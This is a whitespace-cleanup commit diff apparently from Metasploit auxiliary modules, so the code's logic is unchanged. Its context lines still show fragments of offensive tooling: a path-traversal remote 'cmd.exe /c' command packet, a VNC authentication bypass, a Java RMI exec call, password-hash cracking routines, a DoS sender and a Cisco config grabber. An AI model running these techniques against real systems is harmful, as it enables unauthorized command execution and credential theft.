msftidy on aux modules, see #5749
parent
f35b6c5269
commit
67120d4263
|
@ -56,13 +56,13 @@ class Metasploit3 < Msf::Auxiliary
|
|||
if (res and res.code == 500)
|
||||
|
||||
print_status("Request appears successful on #{rhost}:#{rport}! Response: #{res.code}")
|
||||
|
||||
|
||||
file = send_request_raw(
|
||||
{
|
||||
'method' => 'GET',
|
||||
'uri' => '/' + tmpfile,
|
||||
}, 25)
|
||||
|
||||
|
||||
if (file and file.code == 200)
|
||||
print_status("Request for #{datastore['FILE']} appears to have worked on #{rhost}:#{rport}! Response: #{file.code}\r\n#{Rex::Text.decode_base64(file.body)}")
|
||||
elsif (file and file.code)
|
||||
|
|
|
@ -91,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
print_status("Exploited successfully")
|
||||
else
|
||||
print_status("Exploit failed.")
|
||||
end
|
||||
end
|
||||
else
|
||||
print_error("Target appears not vulnerable!")
|
||||
end
|
||||
|
|
|
@ -77,7 +77,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
}, 25)
|
||||
if (res and res.code == 200)
|
||||
print_status("Request ##{level} may have succeeded on #{rhost}:#{rport}:file->#{files}! Response: \r\n#{res.body}")
|
||||
@files_found << files
|
||||
@files_found << files
|
||||
break
|
||||
elsif (res and res.code)
|
||||
print_error("Attempt ##{level} returned HTTP error #{res.code} on #{rhost}:#{rport}:file->#{files}")
|
||||
|
|
|
@ -76,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
}, 25)
|
||||
if (res and res.code == 200)
|
||||
print_status("Request may have succeeded on #{rhost}:#{rport}:file->#{files}! Response: \r\n#{res.body}")
|
||||
@files_found << files
|
||||
@files_found << files
|
||||
elsif (res and res.code)
|
||||
print_error("Attempt returned HTTP error #{res.code} on #{rhost}:#{rport}:file->#{files}")
|
||||
end
|
||||
|
|
|
@ -710,7 +710,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'xp_IsNTAdmin',
|
||||
'xp_mapdown_bitmap'
|
||||
]
|
||||
|
||||
|
||||
query = <<-EOS
|
||||
SELECT CAST(SYSOBJECTS.NAME AS CHAR) FROM SYSOBJECTS, SYSPROTECTS WHERE SYSPROTECTS.UID = 0 AND XTYPE IN ('X','P')
|
||||
AND SYSOBJECTS.ID = SYSPROTECTS.ID
|
||||
|
|
|
@ -57,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
packet << "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\"
|
||||
packet << "windows\\system32\\cmd.exe\" /c #{exec}"
|
||||
packet << "\x00" * (143 + exec.length)
|
||||
|
||||
|
||||
print_status("Sending command: #{exec}")
|
||||
sock.put(packet)
|
||||
sock.get_once(-1,0.5)
|
||||
|
|
|
@ -56,11 +56,11 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
||||
|
||||
if (datastore['VERBOSE'])
|
||||
print_status("Connecting to the server...")
|
||||
end
|
||||
|
||||
|
||||
begin
|
||||
connect()
|
||||
smb_login()
|
||||
|
@ -73,7 +73,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
if (datastore['VERBOSE'])
|
||||
print_status("Checking for file/folder #{datastore['RPATH']}...")
|
||||
end
|
||||
|
||||
|
||||
if (fd = simple.open("\\#{datastore['RPATH']}", 'o')) # mode is open only - do not create/append/write etc
|
||||
print_good("File FOUND: \\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{datastore['RPATH']}")
|
||||
fd.close
|
||||
|
|
|
@ -14,7 +14,7 @@ require 'msf/core'
|
|||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'RealVNC NULL Authentication Mode Bypass',
|
||||
|
@ -66,7 +66,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
print_error("The vncviewer does not appear to be installed, exiting...")
|
||||
return nil
|
||||
end
|
||||
print_status("Spawning viewer thread...")
|
||||
print_status("Spawning viewer thread...")
|
||||
view = framework.threads.spawn("VncViewerWrapper", false) {
|
||||
system("vncviewer 127.0.0.1::#{datastore['LPORT']}")
|
||||
}
|
||||
|
@ -75,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
# Establishes the connection between the viewier and the remote server
|
||||
client = listener.accept
|
||||
add_socket(client)
|
||||
|
||||
|
||||
# Closes the listener socket as it is no longer needed
|
||||
listener.close
|
||||
|
||||
|
@ -91,9 +91,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
client.puts(serverhello)
|
||||
clienthello = client.get_once
|
||||
s.puts(clienthello)
|
||||
|
||||
|
||||
authmethods = s.read(2)
|
||||
|
||||
|
||||
print_status("Auth methods received. Sending null authentication option to client")
|
||||
client.write("\x01\x01")
|
||||
client.read(1)
|
||||
|
@ -121,11 +121,11 @@ class Metasploit3 < Msf::Auxiliary
|
|||
s.put(data)
|
||||
end
|
||||
rescue
|
||||
print_error("Client closed connection")
|
||||
print_error("Client closed connection")
|
||||
closed = true
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
if selected[0].include?(s)
|
||||
begin
|
||||
data = s.get_once
|
||||
|
|
|
@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
sock.put(runtime)
|
||||
res = sock.get_once()
|
||||
methodid = res[5,4]
|
||||
|
||||
|
||||
exec = [0x00].pack('n') + [21 + cmd.length].pack('n') + methodid
|
||||
exec << [0x04000000].pack('V') + "exec" + [0x01000000].pack('V')
|
||||
exec << "\x04" + [0x00].pack('n') + [cmd.length].pack('n') + cmd
|
||||
|
|
|
@ -37,7 +37,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def run
|
||||
wordlist = Rex::Quickfile.new("jtrtmp")
|
||||
hashlist = Rex::Quickfile.new("jtrtmp")
|
||||
|
||||
|
||||
begin
|
||||
# Seed the wordlist with usernames, passwords, and hostnames
|
||||
seed = []
|
||||
|
@ -47,42 +47,42 @@ class Metasploit3 < Msf::Auxiliary
|
|||
seed << john_expand_word( o.user ) if o.user
|
||||
seed << john_expand_word( o.pass ) if (o.pass and o.ptype !~ /hash/)
|
||||
end
|
||||
|
||||
|
||||
# Grab any known passwords out of the john.pot file
|
||||
john_cracked_passwords.values {|v| seed << v }
|
||||
|
||||
|
||||
# Write the seed file
|
||||
wordlist.write( seed.flatten.uniq.join("\n") + "\n" )
|
||||
|
||||
|
||||
print_status("Seeded the password database with #{seed.length} words...")
|
||||
|
||||
|
||||
# Append the standard JtR wordlist as well
|
||||
::File.open(john_wordlist_path, "rb") do |fd|
|
||||
wordlist.write fd.read(fd.stat.size)
|
||||
end
|
||||
|
||||
# Close the wordlist to prevent sharing violations (windows)
|
||||
# Close the wordlist to prevent sharing violations (windows)
|
||||
wordlist.close
|
||||
|
||||
|
||||
# Create a PWDUMP style input file for SMB Hashes
|
||||
smb_hashes = myworkspace.creds.select{|x| x.ptype == "smb_hash" }
|
||||
smb_hashes.each do |cred|
|
||||
hashlist.write( "cred_#{cred[:id]}:#{cred[:id]}:#{cred[:pass]}:::\n" )
|
||||
end
|
||||
hashlist.close
|
||||
|
||||
|
||||
if smb_hashes.length > 0
|
||||
cracked_ntlm = {}
|
||||
cracked_lm = {}
|
||||
added = []
|
||||
|
||||
|
||||
# Crack this in LANMAN format using wordlist mode with tweaked rules
|
||||
john_crack(hashlist.path, :wordlist => wordlist.path, :rules => 'single', :format => 'lm')
|
||||
|
||||
# Crack this in LANMAN format using various incremntal modes
|
||||
john_crack(hashlist.path, :incremental => "All4", :format => 'lm')
|
||||
john_crack(hashlist.path, :incremental => "Digits5", :format => 'lm')
|
||||
|
||||
|
||||
# Parse cracked passwords and permute LANMAN->NTLM as needed
|
||||
cracked = john_show_passwords(hashlist.path, 'lm')
|
||||
cracked[:users].each_pair do |k,v|
|
||||
|
@ -90,52 +90,52 @@ class Metasploit3 < Msf::Auxiliary
|
|||
next if (v[0,7] == "???????" or v[7,7] == "???????")
|
||||
next if not k =~ /^cred_(\d+)/m
|
||||
cid = $1.to_i
|
||||
|
||||
|
||||
cracked_lm[k] = v
|
||||
|
||||
|
||||
cred_find = smb_hashes.select{|x| x[:id] == cid}
|
||||
next if cred_find.length == 0
|
||||
|
||||
|
||||
cred = cred_find.first
|
||||
ntlm = cred.pass.split(":", 2).last
|
||||
done = john_lm_upper_to_ntlm(v, ntlm)
|
||||
cracked_ntlm[k] = done if done
|
||||
end
|
||||
|
||||
|
||||
# Append any cracked values to the wordlist
|
||||
tfd = ::File.open(wordlist.path, "ab")
|
||||
cracked_lm.values.each {|w| if not added.include?(w); tfd.write( w + "\n" ); added << w; end }
|
||||
cracked_ntlm.values.each {|w| if not added.include?(w); tfd.write( w + "\n" ); added << w; end }
|
||||
tfd.close
|
||||
|
||||
|
||||
# Crack this in NTLM format
|
||||
john_crack(hashlist.path, :wordlist => wordlist.path, :rules => 'single', :format => 'nt')
|
||||
|
||||
|
||||
# Crack this in NTLM format using various incremntal modes
|
||||
john_crack(hashlist.path, :incremental => "All4", :format => 'nt')
|
||||
john_crack(hashlist.path, :incremental => "Digits5", :format => 'nt')
|
||||
|
||||
|
||||
# Parse cracked passwords
|
||||
cracked = john_show_passwords(hashlist.path, 'nt')
|
||||
cracked[:users].each_pair do |k,v|
|
||||
next if cracked_ntlm[k]
|
||||
cracked_ntlm[k] = v
|
||||
cracked_ntlm[k] = v
|
||||
end
|
||||
|
||||
|
||||
# Append any cracked values to the wordlist
|
||||
tfd = ::File.open(wordlist.path, "ab")
|
||||
cracked_ntlm.values.each {|w| if not added.include?(w); tfd.write( w + "\n" ); added << w; end }
|
||||
tfd.close
|
||||
|
||||
|
||||
# Store the cracked results based on user_id => cred.id
|
||||
cracked_ntlm.each_pair do |k,v|
|
||||
next if not k =~ /^cred_(\d+)/m
|
||||
cid = $1.to_i
|
||||
|
||||
|
||||
cred_find = smb_hashes.select{|x| x[:id] == cid}
|
||||
next if cred_find.length == 0
|
||||
cred = cred_find.first
|
||||
|
||||
|
||||
print_good("Cracked: #{cred.user}:#{v} (#{cred.service.host.address}:#{cred.service.port})")
|
||||
report_auth_info(
|
||||
:host => cred.service.host,
|
||||
|
@ -148,9 +148,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
)
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
# XXX: Enter other hash types here (shadow, etc)
|
||||
|
||||
|
||||
rescue ::Timeout::Error
|
||||
ensure
|
||||
wordlist.close rescue nil
|
||||
|
|
|
@ -34,7 +34,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
] ,
|
||||
'License' => MSF_LICENSE # JtR itself is GPLv2, but this wrapper is MSF (BSD)
|
||||
)
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptBool.new('Crypt',[false, 'Try crypt() format hashes(Very Slow)', false])
|
||||
|
@ -148,7 +148,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
# Seed the wordlist with usernames, passwords, and hostnames
|
||||
|
||||
myworkspace.hosts.find(:all).each {|o| seed << john_expand_word( o.name ) if o.name }
|
||||
myworkspace.creds.each do |o|
|
||||
myworkspace.creds.each do |o|
|
||||
seed << john_expand_word( o.user ) if o.user
|
||||
seed << john_expand_word( o.pass ) if (o.pass and o.ptype !~ /hash/)
|
||||
end
|
||||
|
|
|
@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def run
|
||||
@wordlist = Rex::Quickfile.new("jtrtmp")
|
||||
|
||||
@wordlist.write( build_seed().flatten.uniq.join("\n") + "\n" )
|
||||
@wordlist.write( build_seed().flatten.uniq.join("\n") + "\n" )
|
||||
@wordlist.close
|
||||
print_status("Cracking MSSQL Hashes")
|
||||
crack("mssql")
|
||||
|
@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
# Seed the wordlist with usernames, passwords, and hostnames
|
||||
|
||||
myworkspace.hosts.find(:all).each {|o| seed << john_expand_word( o.name ) if o.name }
|
||||
myworkspace.creds.each do |o|
|
||||
myworkspace.creds.each do |o|
|
||||
seed << john_expand_word( o.user ) if o.user
|
||||
seed << john_expand_word( o.pass ) if (o.pass and o.ptype !~ /hash/)
|
||||
end
|
||||
|
@ -89,7 +89,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
|
||||
def crack(format)
|
||||
|
||||
|
||||
hashlist = Rex::Quickfile.new("jtrtmp")
|
||||
ltype= "#{format}.hashes"
|
||||
myloots = myworkspace.loots.find(:all, :conditions => ['ltype=?', ltype])
|
||||
|
@ -118,8 +118,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
cracked = john_show_passwords(hashlist.path, format)
|
||||
|
||||
print_status("#{cracked[:cracked]} hashes were cracked!")
|
||||
cracked[:users].each_pair do |k,v|
|
||||
print_status("#{cracked[:cracked]} hashes were cracked!")
|
||||
cracked[:users].each_pair do |k,v|
|
||||
print_good("Host: #{v[1]} Port: #{v[2]} User: #{k} Pass: #{v[0]}")
|
||||
report_auth_info(
|
||||
:host => v[1],
|
||||
|
|
|
@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def run
|
||||
wordlist = Rex::Quickfile.new("jtrtmp")
|
||||
|
||||
wordlist.write( build_seed().flatten.uniq.join("\n") + "\n" )
|
||||
wordlist.write( build_seed().flatten.uniq.join("\n") + "\n" )
|
||||
wordlist.close
|
||||
|
||||
hashlist = Rex::Quickfile.new("jtrtmp")
|
||||
|
@ -69,11 +69,11 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
cracked = john_show_passwords(hashlist.path, 'mysql-fast')
|
||||
|
||||
print_status("#{cracked[:cracked]} hashes were cracked!")
|
||||
print_status("#{cracked[:cracked]} hashes were cracked!")
|
||||
|
||||
#Save cracked creds and add the passwords back to the wordlist for the next round
|
||||
tfd = ::File.open(wordlist.path, "ab")
|
||||
cracked[:users].each_pair do |k,v|
|
||||
cracked[:users].each_pair do |k,v|
|
||||
print_good("Host: #{v[1]} Port: #{v[2]} User: #{k} Pass: #{v[0]}")
|
||||
tfd.write( v[0] + "\n" )
|
||||
report_auth_info(
|
||||
|
@ -82,7 +82,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
:sname => 'mssql',
|
||||
:user => k,
|
||||
:pass => v[0]
|
||||
)
|
||||
)
|
||||
end
|
||||
|
||||
print_status("Trying 'mysql-sha1' Wordlist: #{wordlist.path}")
|
||||
|
@ -137,7 +137,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
# Seed the wordlist with usernames, passwords, and hostnames
|
||||
|
||||
myworkspace.hosts.find(:all).each {|o| seed << john_expand_word( o.name ) if o.name }
|
||||
myworkspace.creds.each do |o|
|
||||
myworkspace.creds.each do |o|
|
||||
seed << john_expand_word( o.user ) if o.user
|
||||
seed << john_expand_word( o.pass ) if (o.pass and o.ptype !~ /hash/)
|
||||
end
|
||||
|
@ -150,7 +150,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
john.each_line{|line| seed << line.chomp}
|
||||
|
||||
return seed
|
||||
|
||||
|
||||
end
|
||||
|
||||
# huh?
|
||||
|
|
|
@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def run
|
||||
@wordlist = Rex::Quickfile.new("jtrtmp")
|
||||
|
||||
@wordlist.write( build_seed().flatten.uniq.join("\n") + "\n" )
|
||||
@wordlist.write( build_seed().flatten.uniq.join("\n") + "\n" )
|
||||
@wordlist.close
|
||||
crack("oracle")
|
||||
crack("oracle11g")
|
||||
|
@ -69,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
|
||||
myworkspace.hosts.find(:all).each {|o| seed << john_expand_word( o.name ) if o.name }
|
||||
myworkspace.creds.each do |o|
|
||||
myworkspace.creds.each do |o|
|
||||
seed << john_expand_word( o.user ) if o.user
|
||||
seed << john_expand_word( o.pass ) if (o.pass and o.ptype !~ /hash/)
|
||||
end
|
||||
|
@ -84,8 +84,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
return seed
|
||||
|
||||
end
|
||||
|
||||
|
||||
|
||||
|
||||
def crack(format)
|
||||
|
||||
hashlist = Rex::Quickfile.new("jtrtmp")
|
||||
|
@ -116,8 +116,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
cracked = john_show_passwords(hashlist.path, format)
|
||||
|
||||
print_status("#{cracked[:cracked]} hashes were cracked!")
|
||||
cracked[:users].each_pair do |k,v|
|
||||
print_status("#{cracked[:cracked]} hashes were cracked!")
|
||||
cracked[:users].each_pair do |k,v|
|
||||
print_good("Host: #{v[1]} Port: #{v[2]} User: #{k} Pass: #{v[0]}")
|
||||
report_auth_info(
|
||||
:host => v[1],
|
||||
|
|
|
@ -28,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'Author' => ['TheLightCosine <thelightcosine[at]gmail.com>'],
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptPath.new('passwd', [true, 'The path to the passwd file']),
|
||||
|
@ -48,4 +48,4 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
|
|
@ -25,14 +25,14 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'Version' => '$Revision$',
|
||||
'Description' => %Q{
|
||||
This module attempts to crack Postgres SQL md5 password hashes.
|
||||
It creates hashes based on information saved in the MSF Database
|
||||
It creates hashes based on information saved in the MSF Database
|
||||
such as hostnames, usernames, passwords, and database schema information.
|
||||
The user can also supply an additional external wordlist if they wish.
|
||||
},
|
||||
'Author' => ['TheLightCosine <thelightcosine[at]gmail.com>'],
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptPath.new('Wordlist', [false, 'The path to an optional Wordlist']),
|
||||
|
@ -54,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
myloots.each do |myloot|
|
||||
begin
|
||||
postgres_array = CSV.read(myloot.path).drop(1)
|
||||
rescue
|
||||
rescue
|
||||
print_error("Unable to process #{myloot.path}")
|
||||
end
|
||||
postgres_array.each do |row|
|
||||
|
@ -69,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
:user => row[0],
|
||||
:pass => password
|
||||
)
|
||||
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
|
@ -115,7 +115,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
# Seed the wordlist with usernames, passwords, and hostnames
|
||||
|
||||
myworkspace.hosts.find(:all).each {|o| seed << john_expand_word( o.name ) if o.name }
|
||||
myworkspace.creds.each do |o|
|
||||
myworkspace.creds.each do |o|
|
||||
seed << john_expand_word( o.user ) if o.user
|
||||
seed << john_expand_word( o.pass ) if (o.pass and o.ptype !~ /hash/)
|
||||
end
|
||||
|
@ -139,7 +139,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
if datastore['Munge']
|
||||
mungedseed=[]
|
||||
seed.each do |word|
|
||||
munged = word.gsub(/[sS]/, "$").gsub(/[aA]/,"@").gsub(/[oO]/,"0")
|
||||
munged = word.gsub(/[sS]/, "$").gsub(/[aA]/,"@").gsub(/[oO]/,"0")
|
||||
mungedseed << munged
|
||||
munged.gsub!(/[eE]/, "3")
|
||||
munged.gsub!(/[tT]/, "7")
|
||||
|
|
|
@ -62,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
sock.put(sploit + "\r\n\r\n")
|
||||
disconnect
|
||||
|
||||
|
||||
print_status("DoS packet unsuccessful.")
|
||||
rescue ::Rex::ConnectionRefused
|
||||
print_status("Unable to connect to #{rhost}:#{rport}.")
|
||||
|
|
|
@ -51,13 +51,13 @@ class Metasploit3 < Msf::Auxiliary
|
|||
print_error("FORMAT string length cannot exceed 125 bytes.")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
fmt = datastore['FORMAT'] + "XX" # XX is 2 bytes used to mark end of memory garbage for regexp
|
||||
begin
|
||||
res = send_request_raw({
|
||||
'uri' => datastore['URI'] + fmt,
|
||||
})
|
||||
|
||||
|
||||
if res.code == 200
|
||||
res.body.scan(/\<td class\=\"loginError\"\>(.+)XX/ism)
|
||||
print_status("Information leaked: #{$1}")
|
||||
|
|
|
@ -62,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def run
|
||||
|
||||
open_pcap
|
||||
|
||||
|
||||
p = PacketFu::TCPPacket.new
|
||||
p.ip_daddr = rhost
|
||||
p.ip_saddr = shost
|
||||
|
|
|
@ -68,7 +68,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
# counts
|
||||
pkt << [1,0,0,0].pack('n*')
|
||||
|
||||
|
||||
if str[0,1] == "."
|
||||
pkt << [str.length].pack('C')
|
||||
end
|
||||
|
|
|
@ -68,21 +68,21 @@ class Metasploit3 < Msf::Auxiliary
|
|||
if datastore['SSL']
|
||||
proto = "https://"
|
||||
end
|
||||
|
||||
|
||||
useragent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15"
|
||||
if datastore['UserAgent'] != nil
|
||||
if datastore['UserAgent'].length > 0
|
||||
useragent = datastore['UserAgent']
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
host = datastore['RHOST']
|
||||
if datastore['VHOST']
|
||||
if datastore['VHOST'].length > 0
|
||||
host = datastore['VHOST']
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
@send_data = {
|
||||
:uri => '',
|
||||
:version => '1.1',
|
||||
|
@ -515,7 +515,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
set_cookie(cookie)
|
||||
print_status("Set cookie:#{cookie}")
|
||||
print_status("Grabbing webpage #{datastore['URL']} from #{datastore['RHOST']} using cookies")
|
||||
|
||||
|
||||
response = send_request_raw(
|
||||
{
|
||||
'uri' => datastore['URL'],
|
||||
|
|
|
@ -55,7 +55,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
shost = datastore['SHOST']
|
||||
shost ||= get_ipv4_addr(@interface) if @netifaces
|
||||
raise RuntimeError ,'SHOST should be defined' unless shost
|
||||
|
||||
|
||||
smac = datastore['SMAC']
|
||||
smac ||= get_mac(@interface) if @netifaces
|
||||
raise RuntimeError ,'SMAC should be defined' unless smac
|
||||
|
|
|
@ -65,10 +65,10 @@ class Metasploit3 < Msf::Auxiliary
|
|||
# Send ping
|
||||
print_status("Sending multicast pings...")
|
||||
dmac = "33:33:00:00:00:01"
|
||||
|
||||
|
||||
# Figure out our source address by the link-local interface
|
||||
shost = ipv6_link_address
|
||||
|
||||
|
||||
ping6("FF01::1", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false})
|
||||
ping6("FF01::2", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false})
|
||||
ping6("FF02::1", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false})
|
||||
|
|
|
@ -109,7 +109,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def neighbor_discovery(neighs)
|
||||
print_status("Discovering IPv6 addresses for IPv4 nodes...")
|
||||
print_status("")
|
||||
|
||||
|
||||
smac = datastore['SMAC']
|
||||
open_pcap({'SNAPLEN' => 68, 'FILTER' => "icmp6"})
|
||||
|
||||
|
|
|
@ -105,7 +105,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
p.ipv6_next = 0x3a
|
||||
p.ipv6_saddr = shost
|
||||
p.ipv6_daddr = dhost
|
||||
|
||||
|
||||
payload = router_advertisement_payload
|
||||
payload << opt60_payload(lifetime, prefix)
|
||||
payload << slla_payload(smac)
|
||||
|
|
|
@ -132,7 +132,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
hname = nil
|
||||
|
||||
case pkt[2]
|
||||
|
||||
|
||||
when 53
|
||||
app = 'DNS'
|
||||
ver = nil
|
||||
|
@ -146,7 +146,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
ver = pkt[0].unpack('H*')[0] if not ver
|
||||
inf = ver if ver
|
||||
|
||||
|
||||
when 137
|
||||
app = 'NetBIOS'
|
||||
|
||||
|
@ -219,7 +219,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
ver = 'NTP v4 (unsynchronized)' if (ver =~ /^e40/)
|
||||
ver = 'Microsoft NTP' if (ver =~ /^dc00|^dc0f/)
|
||||
inf = ver if ver
|
||||
|
||||
|
||||
when 1434
|
||||
app = 'MSSQL'
|
||||
mssql_ping_parse(pkt[0]).each_pair { |k,v|
|
||||
|
@ -231,7 +231,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
asn = OpenSSL::ASN1.decode(pkt[0]) rescue nil
|
||||
return if not asn
|
||||
|
||||
|
||||
snmp_error = asn.value[0].value rescue nil
|
||||
snmp_comm = asn.value[1].value rescue nil
|
||||
snmp_data = asn.value[2].value[3].value[0] rescue nil
|
||||
|
@ -242,7 +242,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
snmp_info = snmp_info.to_s.gsub(/\s+/, ' ')
|
||||
|
||||
inf = snmp_info
|
||||
com = snmp_comm
|
||||
com = snmp_comm
|
||||
|
||||
when 5093
|
||||
app = 'Sentinel'
|
||||
|
|
|
@ -160,7 +160,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
hname = nil
|
||||
|
||||
case pkt[2]
|
||||
|
||||
|
||||
when 53
|
||||
app = 'DNS'
|
||||
ver = nil
|
||||
|
@ -174,7 +174,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
ver = pkt[0].unpack('H*')[0] if not ver
|
||||
inf = ver if ver
|
||||
|
||||
|
||||
when 137
|
||||
app = 'NetBIOS'
|
||||
|
||||
|
@ -248,7 +248,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
ver = 'NTP v4 (unsynchronized)' if (ver =~ /^e40/)
|
||||
ver = 'Microsoft NTP' if (ver =~ /^dc00|^dc0f/)
|
||||
inf = ver if ver
|
||||
|
||||
|
||||
when 1434
|
||||
app = 'MSSQL'
|
||||
mssql_ping_parse(pkt[0]).each_pair { |k,v|
|
||||
|
@ -259,7 +259,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
app = 'SNMP'
|
||||
asn = OpenSSL::ASN1.decode(pkt[0]) rescue nil
|
||||
return if not asn
|
||||
|
||||
|
||||
snmp_error = asn.value[0].value rescue nil
|
||||
snmp_comm = asn.value[1].value rescue nil
|
||||
snmp_data = asn.value[2].value[3].value[0] rescue nil
|
||||
|
@ -270,13 +270,13 @@ class Metasploit3 < Msf::Auxiliary
|
|||
snmp_info = snmp_info.to_s.gsub(/\s+/, ' ')
|
||||
|
||||
inf = snmp_info
|
||||
com = snmp_comm
|
||||
|
||||
com = snmp_comm
|
||||
|
||||
when 5093
|
||||
app = 'Sentinel'
|
||||
|
||||
when 523
|
||||
|
||||
|
||||
app = 'ibm-db2'
|
||||
inf = db2disco_parse(pkt[0])
|
||||
|
||||
|
|
|
@ -83,13 +83,13 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'Content-Type' => 'application/x-amf',
|
||||
'data' => postrequest
|
||||
}, 25)
|
||||
|
||||
|
||||
if (res.nil?)
|
||||
print_error("no response for #{ip}:#{rport} #{check}")
|
||||
elsif (res.code == 200 and res.body =~ /\<\?xml version\="1.0" encoding="utf-8"\?\>/)
|
||||
print_status("#{rhost}:#{rport} #{check} #{res.code}\n #{res.body}")
|
||||
elsif (res and res.code == 302 or res.code == 301)
|
||||
print_status(" Received 302 to #{res.headers['Location']} for #{check}")
|
||||
print_status(" Received 302 to #{res.headers['Location']} for #{check}")
|
||||
else
|
||||
print_error("#{res.code} for #{check}")
|
||||
#''
|
||||
|
|
|
@ -15,13 +15,13 @@ require 'msf/core'
|
|||
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
# Exploit mixins should be called first
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
|
||||
# Include Cisco utility methods
|
||||
include Msf::Auxiliary::Cisco
|
||||
|
||||
|
||||
# Scanner mixin should be near last
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
|
@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'Description' => %q{
|
||||
This module gathers data from a Cisco device (router or switch) with the device manager
|
||||
web interface exposed. The BasicAuthUser and BasicAuthPass options can be used to specify
|
||||
authentication.
|
||||
authentication.
|
||||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
|
@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => "/exec/show/version/CR",
|
||||
'method' => 'GET'
|
||||
|
@ -61,11 +61,11 @@ class Metasploit3 < Msf::Auxiliary
|
|||
print_error("#{rhost}:#{rport} Unexpected response code from this device #{res.code}")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
if res and res.body and res.body =~ /Cisco (Internetwork Operating System|IOS) Software/
|
||||
print_good("#{rhost}:#{rport} Successfully authenticated to this device")
|
||||
|
||||
# Report a vulnerability only if no password was specified
|
||||
|
||||
# Report a vulnerability only if no password was specified
|
||||
if datastore['BasicAuthPass'].to_s.length == 0
|
||||
|
||||
report_vuln(
|
||||
|
@ -81,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
)
|
||||
|
||||
end
|
||||
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => "/exec/show/config/CR",
|
||||
